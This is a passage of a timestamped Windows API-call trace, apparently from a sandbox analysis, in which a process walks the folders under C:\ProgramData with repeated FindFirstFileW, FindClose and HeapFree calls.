lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa329e8 [0140.013] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0140.013] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.013] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.013] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0140.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\Cache\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa329e8 [0140.014] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0140.015] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.015] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.015] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\GameExplorer\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa329a8 [0140.015] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.015] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.063] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.064] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.066] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.066] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Manifest\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.067] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Sessions\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.067] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Upload\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.067] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.067] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32b28 [0140.069] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.069] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32b28 [0140.069] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.070] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32b28 [0140.070] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.070] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32b28 [0140.070] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.070] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.070] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.070] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.071] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.071] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.071] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.071] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.072] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.072] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32b28 [0140.073] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.074] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.074] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.074] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.075] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.076] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.076] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.076] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.076] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.076] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.076] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.076] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.076] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.076] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.077] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.077] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.078] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.078] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.078] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.078] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.078] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.078] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.079] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.079] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.080] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.081] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.081] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.081] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.081] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.081] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.081] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.081] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.082] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.082] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.083] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.083] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.085] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.085] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32b28 [0140.086] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.086] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.086] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.086] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.086] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.086] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.089] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.089] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.089] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.089] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.089] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.089] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.090] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.090] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.090] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.090] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.093] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.093] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.093] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.093] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.093] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.094] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.094] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.094] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.095] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.095] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.095] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.095] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.096] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.096] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.096] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.096] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.096] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.097] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.098] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.098] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.098] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.098] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.099] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.099] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.099] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.099] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.099] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.099] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.102] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.102] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.103] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.103] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.104] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.104] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.105] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.105] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", 